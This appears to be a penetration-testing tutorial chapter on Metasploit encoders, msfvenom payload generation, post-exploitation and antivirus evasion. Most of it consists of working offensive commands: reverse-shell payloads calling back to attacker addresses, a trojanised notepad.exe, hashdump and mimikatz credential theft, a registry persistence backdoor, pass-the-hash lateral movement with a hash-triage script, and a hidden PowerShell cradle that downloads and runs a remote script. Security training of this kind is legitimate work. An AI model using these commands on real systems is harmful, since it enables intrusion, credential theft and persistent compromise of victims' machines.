Encoders & Msfvenom: Advanced Exploitation Techniques
Overview
Advanced exploitation techniques enhance the effectiveness of penetration tests by improving stealth, overcoming security defenses, and customizing payloads. This chapter covers the use of encoders, the msfvenom
tool, and post-exploitation workflows to maximize the utility of Metasploit.
Encoders in Metasploit
Purpose of Encoders:
Transform a payload so that it no longer contains bytes the target will not accept (e.g., a null byte that terminates a C string, or \x0a/\x0d in a line-oriented protocol), and prepend a small decoder stub that restores the original bytes at run time.
Historically also used to slip past signature-based antivirus (AV) and intrusion detection systems (IDS). The stock encoders and their decoder stubs have long since been signatured themselves, so treat encoding as a compatibility tool first and an evasion tool only against very weak defenses.
Popular Encoders:
Shikata Ga Nai:
Most widely used encoder for x86 payloads; a polymorphic XOR additive-feedback encoder, so every run produces a different decoder stub and key.
The name is Japanese for "It cannot be helped".
Its decoder stub has been fingerprinted by AV vendors for years, so do not count on it to bypass AV; use it for bad-character avoidance.
Example:
msfvenom -p <payload> LHOST=<attacker_IP> LPORT=<port> -e x86/shikata_ga_nai -i 5 -f exe > payload.exe
Other Encoders:
x64/xor_dynamic: XOR-based encoder for 64-bit payloads (shikata_ga_nai is x86-only).
cmd/powershell_base64: encodes a command as Base64 for PowerShell's -EncodedCommand form.
List everything available with msfvenom -l encoders.
Encoding a Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > payload.exe
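To make the "remove incompatible characters" job concrete, here is an added Python example (not Metasploit code, and deliberately simpler than shikata_ga_nai, which uses a polymorphic additive-feedback loop rather than a fixed single-byte XOR): it searches for a one-byte XOR key such that neither the key nor any encoded byte is a bad character, applies several rounds the way -i does, and decodes the result again. The payload bytes are constructed for the example and are not shellcode.

```python
"""Single-byte XOR encoder with bad-character-aware key selection.

Added illustration of what an encoder does for the "remove incompatible
characters" use case. This is not Metasploit code and not shikata_ga_nai
(a polymorphic additive-feedback encoder); it shows the principle only.
"""
from __future__ import annotations

# Constructed sample "payload": not real shellcode, just bytes chosen to
# contain the classic bad characters 0x00, 0x0a and 0x0d.
SAMPLE_PAYLOAD = bytes([0x31, 0xC0, 0x00, 0x50, 0x0A, 0x68, 0x0D, 0x2F, 0x73, 0x68, 0xFF])
BADCHARS = b"\x00\x0a\x0d"


def find_badchars(buf: bytes, badchars: bytes) -> list[tuple[int, int]]:
    """Return (offset, value) for every byte of buf that is in badchars."""
    return [(i, b) for i, b in enumerate(buf) if b in badchars]


def xor_encode(buf: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key (decoding is the same operation)."""
    return bytes(b ^ key for b in buf)


def choose_key(buf: bytes, badchars: bytes) -> int:
    """Pick a key such that neither the key byte (it ships inside the
    decoder stub) nor any encoded byte is a bad character."""
    for key in range(1, 256):
        if key in badchars:
            continue
        if not find_badchars(xor_encode(buf, key), badchars):
            return key
    raise ValueError("no single-byte key avoids the bad characters; "
                     "a multi-byte or feedback encoder is needed")


def encode_iterations(buf: bytes, badchars: bytes, iterations: int) -> tuple[list[int], bytes]:
    """Encode `iterations` times (what the -i flag does), choosing a fresh
    key each round; returns the keys in encoding order and the final buffer."""
    keys: list[int] = []
    for _ in range(iterations):
        key = choose_key(buf, badchars)
        buf = xor_encode(buf, key)
        keys.append(key)
    return keys, buf


def decode_iterations(buf: bytes, keys: list[int]) -> bytes:
    """Undo encode_iterations: a decoder stub applies the keys in reverse."""
    for key in reversed(keys):
        buf = xor_encode(buf, key)
    return buf


if __name__ == "__main__":
    keys, encoded = encode_iterations(SAMPLE_PAYLOAD, BADCHARS, 2)
    print("keys:", keys)
    print("encoded:", encoded.hex())
    print("bad bytes left:", find_badchars(encoded, BADCHARS))
```

Two things the example makes visible: the key is constrained by the same bad-character list as the payload, because it ends up inside the decoder stub; and stacking single-byte XOR rounds collapses to one XOR with the XOR of all keys, so iterations of a trivial encoder add no work for a scanner that emulates the stub. shikata_ga_nai's feedback chain avoids that collapse, but its stub is still recognisable.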
Using msfvenom
What is msfvenom?
A tool for generating and encoding custom payloads.
Replaced the older msfpayload and msfencode utilities (retired in 2015).
Key Features:
Generates shellcode, standalone executables, and scripts.
Encodes payloads to evade detection.
Customizable formats for different platforms.
Basic Syntax:
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> > <output_file>
Common Options:
-p <payload>: payload to generate (msfvenom -l payloads lists them).
LHOST=<ip>: attacker's IP address, the host a reverse payload calls back to.
LPORT=<port>: port the handler listens on.
-f <format>: output format (e.g., exe, aspx, elf, raw, python; msfvenom -l formats lists them).
-e <encoder>: encoder to use.
-i <n>: number of encoding iterations.
-b "<bytes>": bad characters to avoid, e.g. "\x00\x0a\x0d"; msfvenom then selects a compatible encoder itself.
-x <file> / -k: use an existing executable as a template and keep its original behaviour.
Examples of msfvenom Usage
Generate a Reverse Shell for Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > reverse_shell.exe
Create an ASP.NET Page Payload (for upload to an IIS target that serves .aspx):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f aspx > exploit.aspx
Encode a Payload with Shikata Ga Nai:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f elf > payload.elf
Custom Payload with Bad Character Exclusion (msfvenom picks an encoder that can avoid the listed bytes and aborts if none can):
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=1337 -b "\x00\x0a\x0d" -f exe > clean_payload.exe
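Checking the generated artefact instead of trusting the "found compatible encoder" message: this added Python example (not msfvenom's own code) reassembles the bytes from the -f python output layout, a `buf =  b""` line followed by `buf += b"..."` lines, and reports the offset of any remaining bad byte. The sample output below is constructed and is not a working payload.

```python
"""Check a payload emitted with `msfvenom ... -f python` for bad characters.

Added example, not part of msfvenom. It assumes the -f python layout that
msfvenom prints: a `buf =  b""` line followed by `buf += b"..."` lines.
"""
from __future__ import annotations

import ast
import re

# One `buf = b"..."` or `buf += b"..."` line; group 1 is the bytes literal.
_BYTES_LITERAL = re.compile(r'^\s*buf\s*\+?=\s*(b"(?:[^"\\]|\\.)*")\s*$')

# Constructed sample in the -f python layout; the byte values are made up
# and do not form a working payload. Offset 13 holds a 0x0a on purpose.
SAMPLE_OUTPUT = r'''buf =  b""
buf += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
buf += b"\x68\x2f\x62\x69\x6e\x0a\x89\xe3"
'''


def load_python_format(text: str) -> bytes:
    """Reassemble the payload bytes from msfvenom's -f python output."""
    payload = b""
    for line in text.splitlines():
        m = _BYTES_LITERAL.match(line)
        if m:
            # literal_eval parses only the bytes literal; it never executes code.
            payload += ast.literal_eval(m.group(1))
    return payload


def find_badchars(buf: bytes, badchars: bytes) -> list[tuple[int, int]]:
    """Return (offset, value) for every byte of buf that is in badchars."""
    return [(i, b) for i, b in enumerate(buf) if b in badchars]


def verify(text: str, badchars: bytes) -> dict:
    """Parse the output and report length, offending offsets and a verdict."""
    payload = load_python_format(text)
    hits = find_badchars(payload, badchars)
    return {"length": len(payload), "hits": hits, "clean": not hits}


if __name__ == "__main__":
    report = verify(SAMPLE_OUTPUT, b"\x00\x0a\x0d")
    print(report)
    for offset, value in report["hits"]:
        print(f"bad byte 0x{value:02x} at offset {offset}")
```

For -f hex output, bytes.fromhex(text.strip()) replaces load_python_format. Run the check after any post-processing too (template injection, manual patching of the blob), since those steps are outside msfvenom's own bad-character check.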
Post-Exploitation Techniques
Once an exploit succeeds, post-exploitation focuses on maintaining access, gathering information, and preparing for further attacks.
Privilege Escalation:
Use local_exploit_suggester to list local privilege escalation exploits whose checks pass against the session; it only reports applicability, so review each suggestion before running it:
use post/multi/recon/local_exploit_suggester
set SESSION <session_id>
run
Gathering Credentials:
Extract password hashes from the SAM (needs SYSTEM privileges; escalate first if it fails):
meterpreter > hashdump
Use Mimikatz to pull cleartext credentials and tickets from LSASS (legacy mimikatz extension syntax):
meterpreter > load mimikatz
meterpreter > mimikatz_command -f "sekurlsa::logonpasswords"
On current Metasploit the mimikatz extension is superseded by kiwi (load kiwi, then creds_all). Either way the session must run as SYSTEM and the Meterpreter architecture must match the OS (migrate to a 64-bit process on 64-bit Windows).
Persistence:
Install a persistent backdoor on the target. This module drops a script to disk and creates a registry Run key, so it is noisy; set PAYLOAD and LHOST to match your handler, and keep the cleanup resource script it prints so the implant can be removed at the end of the engagement:
use exploit/windows/local/persistence
set SESSION <session_id>
set LPORT 4445
run
Data Exfiltration:
Download files from the target system:
meterpreter > download <target_file> <local_path>
Lateral Movement:
Reuse recovered credentials or hashes against other hosts: smb_login checks them across a range (SMBUser/SMBPass accept an LM:NT hash pair as well as a password), and exploit/windows/smb/psexec then opens a session on each host where they work. Internal subnets are reached by routing through the existing session first (route add, or post/multi/manage/autoroute):
use auxiliary/scanner/smb/smb_login
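Triage of hashdump output before it is fed to smb_login or psexec, as an added Python example that ties the Gathering Credentials and Lateral Movement steps together (not a Metasploit module): it parses the user:rid:LM:NT::: lines, flags blank passwords, accounts that still have an LM hash, NT hashes shared by several accounts (password reuse is the quickest lateral-movement win), and formats LM:NT for SMBPass. The sample dump is constructed; the only real constants are the well-known empty-LM and empty-NT values.

```python
"""Triage the output of Meterpreter's hashdump.

Added example, not a Metasploit module. The sample lines are constructed
(user names, RIDs and hashes invented for the example); only EMPTY_LM and
EMPTY_NT are real, well-known constants.
"""
from __future__ import annotations

from collections import defaultdict

# LM field shown when no LM hash is stored (LM storage is off by default
# since Windows Vista), and the NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in hashdump's user:rid:LM:NT::: layout.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1002:e52cac67419a9a224a3b108f3fa6cb6d:5835048ce94ad0564e29a924a03510ef:::
"""


def parse_hashdump(text: str) -> list[dict]:
    """Turn hashdump lines into dicts; lines without four colon-separated
    fields (banners, blanks) are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line.count(":") < 3:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def triage(entries: list[dict]) -> dict:
    """Group findings a tester acts on first."""
    by_nt: dict[str, list[str]] = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        # NT hash of "" means the account has no password set.
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        # A real LM hash means a short password that cracks in minutes.
        "lm_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        # Same NT hash on several accounts: one crack or one pass-the-hash
        # covers all of them.
        "shared_nt": {nt: users for nt, users in by_nt.items()
                      if len(users) > 1 and nt != EMPTY_NT},
    }


def smbpass_for(entry: dict) -> str:
    """Value for SMBPass in psexec / smb_login when passing the hash."""
    return f"{entry['lm']}:{entry['nt']}"


if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_HASHDUMP)
    print(triage(entries))
    for e in entries:
        print(f"set SMBUser {e['user']}; set SMBPass {smbpass_for(e)}")
```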
Bypassing AV and IDS
Techniques for Evasion:
Encoding with msfvenom:
Multiple iterations re-encode the already encoded buffer; each round adds another decoder stub and grows the file. This defeats only naive byte-pattern matching: the stub sequence is well known and emulating scanners unwrap it, so expect a stock-encoded payload to be detected regardless of the iteration count:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -e x86/shikata_ga_nai -i 10 -f exe > stealth_payload.exe
Template Injection:
Embed the payload in a legitimate executable (-x) and keep the host program's normal behaviour (-k) so the result looks and runs like the original; the template must match the payload architecture (x86 payload, x86 template). The injected bytes are still the same known payload, so this buys user plausibility more than AV evasion:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -x notepad.exe -k -f exe > infected_notepad.exe
Memory-Only Execution:
Run the payload without writing a file to disk, e.g. a staged payload whose small stager pulls the rest over the network, or a script format (-f psh, -f python) executed by an interpreter already on the host. This sidesteps on-access file scanning but not memory scanning or behavioural detection.
Obfuscation:
Use PowerShell or scripting wrappers to hide how the payload is fetched and executed. The download cradle below (IEX plus DownloadString) is itself a well-known pattern flagged by AMSI and script-block logging, so treat it as a starting point rather than a finished technique:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker_IP>/payload.ps1')"
Command Cheatsheet
msfvenom
Generate and encode payloads.
use post/multi/recon/local_exploit_suggester
Suggest privilege escalation exploits.
meterpreter > hashdump
Extract password hashes from the target.
meterpreter > load mimikatz
Load Mimikatz for credential harvesting (legacy; load kiwi on current versions).
meterpreter > download <file>
Download files from the target system.
msfconsole -q
Launch Metasploit in quiet mode.